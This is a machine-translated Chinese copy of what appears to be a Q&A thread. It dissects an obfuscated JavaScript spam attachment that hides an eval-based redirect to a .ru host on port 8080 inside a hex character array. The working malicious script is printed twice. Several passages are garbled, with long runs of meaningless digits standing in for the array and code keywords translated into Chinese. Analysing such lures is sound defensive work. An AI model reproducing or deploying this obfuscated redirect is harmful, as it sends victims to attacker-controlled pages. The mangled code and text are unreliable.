Javascript-混淆-从坏人那里学习
今天早上我收到一些垃圾邮件。我注意到附件是一个.html文件。我没有把它当作垃圾,而是把它当作一个学习的机会,复制到我的桌面上,并将它重命名为.txt并加载到记事本中 以下是垃圾邮件附件中显示的html+模糊脚本:Javascript-混淆-从坏人那里学习,javascript,Javascript,今天早上我收到一些垃圾邮件。我注意到附件是一个.html文件。我没有把它当作垃圾,而是把它当作一个学习的机会,复制到我的桌面上,并将它重命名为.txt并加载到记事本中 以下是垃圾邮件附件中显示的html+模糊脚本: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Please wait</title> <
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>asgq= [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;if(dbshre){vfvwe=0; try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
s="";for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
z=s;e(s);}}</script>
</body>
</html>
请稍等
请稍等。您将被转发。
Internet Explorer/Mozilla Firefox仅兼容
asgq=0x76.0 0 0 0 0 7 7 7 7 0 0 0 0 7 7 7 7 7 7 7 0 0 0 0 0 0 6 6 6 0 0 0 0 7 7 7 7 7 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 0x2f、0x2f、0x67、0x69、0x6c、0x69、0x61、0x6f、0x6e、0x73、,0x6 F,0x66,0x6 6 F,0x6 6 6 7 7 7 7 7 7 7 7 7 6 6 6 6 6 6 6 F,0x6 6 6 6 6 6 6 6 6 6 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0若(!vfvwe){e=window[“e”.concat(“val”)];}
s=”“;for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
z=s;e(s);}
我做的第一件事就是把它排成一行,让它更具可读性:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
asgq=[0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];
try{document.body&=0.1}
catch(gdsgsdg)
{
zz=3;
dbshre=56;
if(dbshre){
vfvwe=0;
try{}
catch(agdsg)
{vfvwe=1;}
if(!vfvwe){
e=window["e".concat("val")];
s="";
for(i=0;i-105!=0;i++){
if(window.document)
s+=String.fromCharCode(asgq[i]);
}
z=s;
e(s);
}
}
</script>
</body>
</html>
请稍等
请稍候。您将被转发。
Internet Explorer/Mozilla Firefox仅兼容
asgq=0x76.0 0 0 0 0 7 7 7 7 0 0 0 0 7 7 7 7 7 7 7 0 0 0 0 0 0 6 6 6 0 0 0 0 7 7 7 7 7 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 7 7 7 7 7 7 7 7 7 7 7 7 7 0x2f、0x2f、0x67、0x69、0x6c、0x69、0x61、0x6f、0x6e、0x73、,0x6f、0x2e、0x72、0x75、0x3a、0x38、0x30、0x38、0x30、0x2f、0x66、0x6f、0x72、0x75、0x6d、0x2f、0x6c、0x69、0x6e、0x6b、0x73、0x2f、0x63、0x6f、0x6c、0x75、0x6d、0x6e、0x2e、0x70、0x68、0x70、0x22、0x3b、0x7d];
请尝试{document.body&=0.1}
捕获量(gdsgsdg)
{
zz=3;
dbshre=56;
if(dbshre){
vfvwe=0;
试试{}
捕获(agdsg)
{vfvwe=1;}
如果(!vfvwe){
e=窗口[“e”。concat(“val”)];
s=“”;
对于(i=0;i-105!=0;i++){
if(window.document)
s+=String.fromCharCode(asgq[i]);
}
z=s;
e(s);
}
}
在这一点上,很明显脚本作者正在将asgq数组中的好东西隐藏为字符代码。0x76=“v”、0x61=“a”、0x72=“r”等等……嗯,前3个元素已经拼出了“var”
asgq.length=105。在for循环中,作者使用的结束条件是“i-105!=0”,这是一种令人困惑的说法,表示i0
分配给文档。正文
将引发错误:
document.body&=0.1
//is the same as
document.body = document.body & 0.1;
//document.body & *anything* returns 0
2) catch
以一个可值的名称作为参数,您可以随意命名它(包括agdsg
)
3) 让我们把它分解一下:
e=window["e".concat("val")];
//"e".concat("val") returns "eval"
e=window["eval"]
//which gives you the global "eval()" function
基本上,作者将该数组解码为一个要执行的代码字符串,然后使用
eval()
来运行它。他们之所以不使用eval(“var…”)
是因为混淆eval off(以及字符串)会使过滤器(或人)更加困难查看它是否正在运行eval。如果它知道它正在运行eval,它可能会检查字符串并停止重定向代码。2.不管你给它取什么名字,它总是做同样的事情,因为它只是一个变量名。3.如果你取“e”
和concat“val”,会发生什么
?@IgorJerosimić:尽管有一个非常相关的原因。作者打算隐藏代码的目的,因此重命名变量名是通过病毒软件哈希检查的一种非常简单的方法。catch
接受变量,你可以随意命名它(如agdsg
).@系统,那是邪恶的!!所以作者使用的是:eval(s)。